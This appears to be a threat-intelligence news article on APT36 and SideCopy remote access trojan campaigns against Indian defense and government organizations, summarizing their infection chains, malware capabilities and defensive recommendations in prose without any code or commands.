APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Entities

Pakistan-aligned threat clusters APT36 and SideCopy have launched sophisticated cross-platform remote access trojan (RAT) campaigns targeting Indian defense sector organizations and government-aligned entities, according to recent cybersecurity research.

These campaigns demonstrate an evolution in espionage tactics, with threat actors expanding their capabilities beyond traditional Windows environments to include Linux systems. The attacks employ multiple malware families including Geta RAT, Ares RAT, and DeskRAT, all designed to provide persistent remote access, enable system reconnaissance, collect sensitive data, execute commands, and facilitate long-term post-compromise operations.

Campaign Origins and Attribution

APT36, also known as Transparent Tribe, and SideCopy are assessed to operate as Pakistan-aligned threat clusters. SideCopy has been active since at least 2019 and is considered a subdivision of Transparent Tribe. These groups have demonstrated consistent targeting of Indian defense, government, and strategic sectors over several years.

"Taken together, these campaigns reinforce a familiar but evolving narrative," said Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka. "Transparent Tribe and SideCopy are not reinventing espionage – they are refining it."

Attack Methodology

Initial Access Vectors

The campaigns begin with phishing emails containing malicious attachments or embedded download links that direct targets to attacker-controlled infrastructure. These initial access mechanisms serve as conduits for various malicious files:

• Windows shortcuts (LNK files)
• ELF binaries for Linux systems
• PowerPoint Add-In files

Multi-Stage Infection Process

One documented attack chain involves a malicious LNK file that invokes "mshta.exe" to execute an HTML Application (HTA) file hosted on compromised legitimate domains. The HTA payload contains JavaScript that decrypts an embedded DLL payload, which then:

1. Processes an embedded data blob to write a decoy PDF to disk
2. Connects to a hard-coded command-and-control (C2) server
3. Displays the saved decoy file to distract the victim

After displaying the lure document, the malware checks for installed security products and adapts its persistence method accordingly before deploying Geta RAT on the compromised host.

Malware Capabilities

Geta RAT

Geta RAT provides comprehensive capabilities including:

• System information collection
• Running process enumeration and termination
• Installed applications listing
• Credential harvesting
• Clipboard content retrieval and replacement
• Screenshot capture
• File operations
• Arbitrary shell command execution
• USB device data harvesting

Ares RAT

A Linux variant employs a Go binary as a starting point to drop a Python-based Ares RAT through a shell script downloaded from an external server. Ares RAT offers similar capabilities to Geta RAT, including data harvesting and command execution.

DeskRAT

DeskRAT is delivered via rogue PowerPoint Add-In files that run embedded macros to establish outbound communication with remote servers. This malware was documented by Sekoia and QiAnXin XLab in October 2025 as part of APT36's toolkit.

Target Landscape

The attacks extend beyond traditional defense targets to include:

• Policy organizations
• Research institutions
• Critical infrastructure
• Defense-adjacent organizations
• Government-aligned entities

"These campaigns demonstrate a well-resourced, espionage-focused threat actor deliberately targeting Indian defense, government, and strategic sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure," according to Aryaka's analysis.

Technical Sophistication

The campaigns showcase several advanced techniques:

• Cross-platform coverage: Simultaneous targeting of Windows and Linux environments
• Memory-resident techniques: Malware designed to operate below traditional detection thresholds
• Decoy document deployment: Legitimate-looking PDFs used to distract victims during infection
• Security product adaptation: Malware that detects and adapts to security software presence
• Trusted infrastructure abuse: Use of compromised legitimate domains for C2 communications

Defensive Recommendations

Organizations in targeted sectors should implement the following measures:

1. Enhanced email security: Deploy advanced phishing detection and sandboxing for attachments
2. Multi-platform monitoring: Implement security solutions that cover both Windows and Linux environments
3. User awareness training: Educate personnel about defense-themed phishing lures and document impersonation
4. Network segmentation: Isolate critical systems from general user environments
5. Regular patching: Maintain up-to-date systems to reduce exploitation opportunities
6. Behavioral monitoring: Deploy solutions that detect anomalous process execution and network communications

Attribution Context

The activity reinforces the persistent nature of Pakistan-aligned cyber espionage operations against Indian targets. These campaigns represent a continuation of long-standing geopolitical tensions manifesting in the cyber domain, with threat actors demonstrating increasing sophistication in their cross-platform capabilities and evasion techniques.

The use of multiple RAT families across different operating systems suggests a well-resourced operation with access to diverse malware development capabilities. The consistent targeting of defense and government sectors indicates strategic intelligence collection objectives rather than financially motivated cybercrime.

This campaign highlights the ongoing evolution of state-sponsored cyber espionage, where threat actors continuously refine their tactics while maintaining focus on strategic objectives. The cross-platform approach and use of legitimate infrastructure for malicious purposes demonstrate the sophisticated nature of modern cyber espionage operations targeting government and defense organizations.